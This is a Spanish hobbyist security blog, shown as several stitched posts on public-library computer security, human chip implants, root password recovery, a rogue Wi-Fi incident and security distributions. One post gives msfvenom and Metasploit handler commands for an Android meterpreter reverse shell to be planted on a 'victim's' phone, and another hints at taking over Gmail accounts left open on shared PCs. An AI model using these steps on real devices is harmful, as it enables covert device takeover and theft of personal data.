2. Un aviso continuo de que el certificado de seguridad caducó y que debe de dar la excepción.

Dándome esas dos opciones me da que vamos a ir descartando el proxy, así que usaremos la navegación privada para al menos no dejar rastro de donde entramos y para que entramos.
Por desafortunada suerte, veo que esa opción no se usa mucho.
He llegado a ver en esos ordenadores cuentas de correo electrónico, accesos a la Seguridad Social y un sinfín de más cosas que llevan por bandera la etiqueta de "Datos Personales" o "Confidencial" y no solo eso, sino cuentas de correo electrónico, de GMail, que con un correo temporal puedes hacer que te manden la contraseña de ese correo electrónico.

No nos quedemos ahí. Tenemos también en estos ordenadores currículums, con números de Seguridad Social, DNI o datos sensibles.
Os puedo dejar claro que hay muchos diciendo saber de informática pero creo que la seguridad es su asignatura pendiente.

Como buen samaritano, yo uso muchos ordenadores y me encargo de dejarlos limpios ya que, por mucho cuidado que uno tenga, algo queda.

Por último queda mandar un correo a estas personas, a través de un mail temporal exponiéndoles la situación y unos consejos de seguridad que ya casi son plantilla pero bueno, vemos que la seguridad no les importa a muchos hoy en día.

Sobre el tema de los que se conectan por Wi-Fi, resumido, todo lo anterior además de poder acceder a tu teléfono móvil, ordenador, tablet o incluso tu propio cuerpo (si quieres saber el motivo de esto último entra aquí ¿Implante de chips a humanos? )

En fin, solo me queda despedirme de esta entrada por hoy, siguiendo insistiendo desde la sombra (ya que si me persono o no están, o dicen que eso lo lleva el técnico, que no saben nada) a que mejoren la seguridad de la red que ofrencen, siendo usada por los mismos bibliotecarios, además de por donde se conecta el ordenador (un XP) donde están todos nuestros datos.

Att. 3m4nu3l1, desde uno de estos ordenadores "bomba"

¿Implantes de chips a humanos? | Crítica de noticia

Buenos días hackers, hoy leyendo mi Twitter he llegado a una noticia del periódico "El Mundo" la cual versa sobre una empresa en  bélgica que implanta chips a sus trabajadores, y no, no es "El Mundo Today".

La noticia versa de la empresa NewFusion , una agencia de medios digitales la cual decidió colocar estos chips para tener mayor seguridad a la hora de coger los ordenadores o acceder a zonas restringidas, llevando el Doble Factor de Autenticación (Algo que se, que soy, que tengo) a límites extremistas aún calificándolo miembros como un acercamiento del ser humano al IoT.

El chip en cuestión, del tamaño de un grano de arroz.

Esta tecnología no es tan lejana como parece, es más, es casi la misma que los microchips de nuestras mascotas pero aún así, en un mundo que intentamos estar más seguros de nuestra intimidad, la estamos perdiendo a pasos agigantados como este además que nuestro propio cuerpo será hackeado.

Los métodos para instalarlo y comprarlo son "graciosos" (por no decir locos). El chip se vende por 20 céntimos la unidad en China aunque, siendo listos los belgas, lo han comprado en EEUU aunque  la unidad salga a 100€. El método en sí lo realiza un tatuador (sí, un tatuador coloca elementos inteligentes) con una aguja como las usadas para sacar sangre y se introduce en la mano, entre el índice y el pulgar.

Pero no, de momento no te obligan a ponerlo ya que pueden seguir con la tarjeta de acceso o incluso anillos o brazalete con la tecnología integrada.

Para acabar, si eres como yo, fan del programa de Los Simpsons, sabrás que ya salió el caso de una empresa que implanta chips en sus empleados ;)

Noticia de la Opinión de Hoy

Mi experiencia con W8 y Kali en mismo ordenador + Asesinato

Que tal! Hoy os vengo a hablar sobre mi experiencia e intento de que compaginen Kali Linux y Windows 8 en un mismo PC y los resultados finales. Al final de la entrada también voy a comentar una noticia que he visto y es verídica a pesar de no parecerlo así que si quieres saber como acaba la historia sigue leyendo ;)

Crear PAYLOAD para Android con Metasploit

En el tutorial de hoy os voy a enseñar como crear un Payload con la aplicación Metasploit integrada en Kali Linux ya que en la distro nos viene más completa que descargándola de Internet.

PAYLOAD
Un payload es un virus o malware que consiste en realizar una acción (normalmente maliciosa) en un dispositivo que esté conectado dentro de nuestra red o fuera de otra. El fin que tiene un payload es tener control total y remoto del dispositivo que se quiera interceptar en cuestión.

METASPLOIT
Metasploit es una herramienta de hacking y pentesting destinada a la explotación y tests de penetración de una manera sencilla. Esta herramienta es conocida por ser como una "navaja suiza" para los hackers y prácticamente todas las distribuciones de Linux lo traen.

¿COMO CREAMOS EL PAYLOAD?

1. Abrimos nuestro sistema operativo de seguridad preferido, luego la aplicación "Metasploit" y escribimos el comando"msfvenom -p android/meterpreter/reverse_tcp LHOST=xxxx LPORT=xxxx R > name.apk"

El comando se divide en varias partes que son:

• msfvenom -> Es la aplicación donde desarrollamos el payload
• -p -> Estamos indicando que vamos a realizar un payload
• android/meterpreter/reverse_tcp -> Es el tipo de payload que necesitamos
• LHOST -> Es la IP que usará la aplicación para comunicarse con nosotros. Si se va a hacer dentro de la red nuestra el valor es 192.168.1.1 pero si es fuera de nuestra red deberá ser nuestra IP Pública
• LPORT -> Es el puerto donde se conectará nuestra aplicación. Si la red es interna yo uso el puerto 8080 pero si es en una red exterior deberemos abrir el puerto que deseemos
• R > name.apk -> Es la ruta donde almacenaremos el payload y con que nombre. La ruta por defecto (cuando ponemos solo el nombre, es la carpeta personal o la de root).

2. Una vez hayamos introducido el payload en el móvil de nuestra víctima ponemos los siguientes comandos:

• msfconsole ->Iniciamos la aplicación de monitoreo
• use multi/handler
• set PAYLOAD android/meterpreter/reverse_tcp -> Indicamos cual payload queremos detectar
• set LHOST xxxx -> Indicamos la IP asignada al payload.
• set LPORT xxxx -> Indicamos el puerto asignado al payload
• exploit

Una vez llegados a este punto deberemos tener control total sobre el teléfono.

AVISO: Este tutorial debe ser usado con fines didácticos y en un dispositivo propio ya que sino es un delito de privacidad o en todo caso con el consentimiento del dueño del terminal.

Como recuperar clave de ROOT para distros de Linux

Hoy os traigo una guía donde podréis recuperar vuestra clave de superusuario en caso de olvidarla o extraviarla.

Comenzamos iniciando un live CD en la máquina, en mi caso uno de Kali Linux y a continuación abrimos un terminal y escribimos el siguiente comando:

Si os da error poned primero "sudo su" y listo.

Con este comando se nos mostrará una lista de las particiones que hay en la máquina, deberemos anotar el que tiene el asterisco ya que ahí se encuentran los ficheros del sistema.

Una vez obtenida la partición tipeamos los comandos "mkdir /tmp/sdax" y "mount /dev/sdax /tmp/sdax"

El primer comando crea el directorio donde montaremos la partición, el segundo es montarla. La x de sdax la cambiamos por el número de la partición.

Una vez montado la partición entramos en el directorio raíz con el comando "chroot /tmp/sdax" y escribimos el comando "passwd root" para cambiar la clave.

Por último desmontamos la partición con "umount /tmp/sdax" y reiniciamos la máquina.

Cerramos el live CD, retiramos el CD o el USB y reiniciamos la máquina y ponemos el usuario y la clave que escogimos antes.

Con esto tendríamos por recuperada la clave de superusuario. Para cualquier otro usuario el procedimiento es el mismo pero cambiando en comando "passwd root" el root por el nombre de usuario.

SEGURIDAD INFORMÁTICA | ROBAN VARIAS IDENTIDADES EN BIBLIOTECA

Normalmente cuando uno va a la biblioteca va a estudiar, a leer o a hacer trabajos.
También hemos dicho que nadie está seguro si tiene un Smartphone pero, ¿que pasa si combinamos ambos?

En el día de hoy, 06 de Febrero, a las 19:30 aprox. ocurrió un fenómeno extraño el cual provocaba que en nuestros móviles se conectaran a routers "ficticios" que tenían los nombres de routers asociados a nuestros móviles, es más, si entrábamos en la configuración del Wi-Fi de nuestros móviles podíamos ver varias conexiones abiertas pero, ¿cómo accedo sin quererlo a esa red?

Sencillo, si tienes una red guardada en Android o iOS, si detecta el SSID (Nombre de Red) de una guardada anteriormente el móvil se conecta a este, así sin más.

El ataque, según nos informan desde Alcalá de Guadaira, se realizó como dije anteriormente aproximadamente a las 19.30h en la Casa de la Cultura así que si has estado en ese tiempo ahí puedes haber sufrido un robo de los datos de tu teléfono así que os recomiendo revisar lo que tenéis guardado en el teléfono e incluso formatear el teléfono ante la posibilidad de virus que pueden monitorizar el teléfono en cualquier parte.

Sin más os dejo el acertijo de esta semana...

Juan, Marta y Francisco estaban en la biblioteca en el momento del ataque, uno de los nombres de los routers falsos era el de Marta pero no ha sido infectada ni atacada. ¿Cómo es posible?

Hablemos de... WHATSAPP

Hoy tenemos en el punto de mira a la famosa y "Monopólica" aplicación de Whatsapp, algo raro pero a medida que vayas leyendo entenderás el porqué.

Distros de Seguridad

A lo largo que escriba este blog vamos a usar varios distros de Linux (Atacantes y Servidores) y Windows (Máquina Atacada y Servidores)

En Windows usaremos todas las distros y Windows Server 2012.

En Linux usaremos las siguientes distros:

• Kali Linux https://www.kali.org/downloads/
• Wifislax http://www.wifislax.com/descargar-wifislax-4-12-hacking-wireless-al-maximo/
• Wifiway http://www.wifiway.org/category/download/
• Ubuntu Desktop 16.04.1 LTS https://www.ubuntu.com/download/desktop
• Ubuntu Server 16.04.1. LTS https://www.ubuntu.com/download/server

Todas las URL’s indicadas son páginas oficiales de las distros que permiten su descarga web.

(LEER AVISO LEGAL)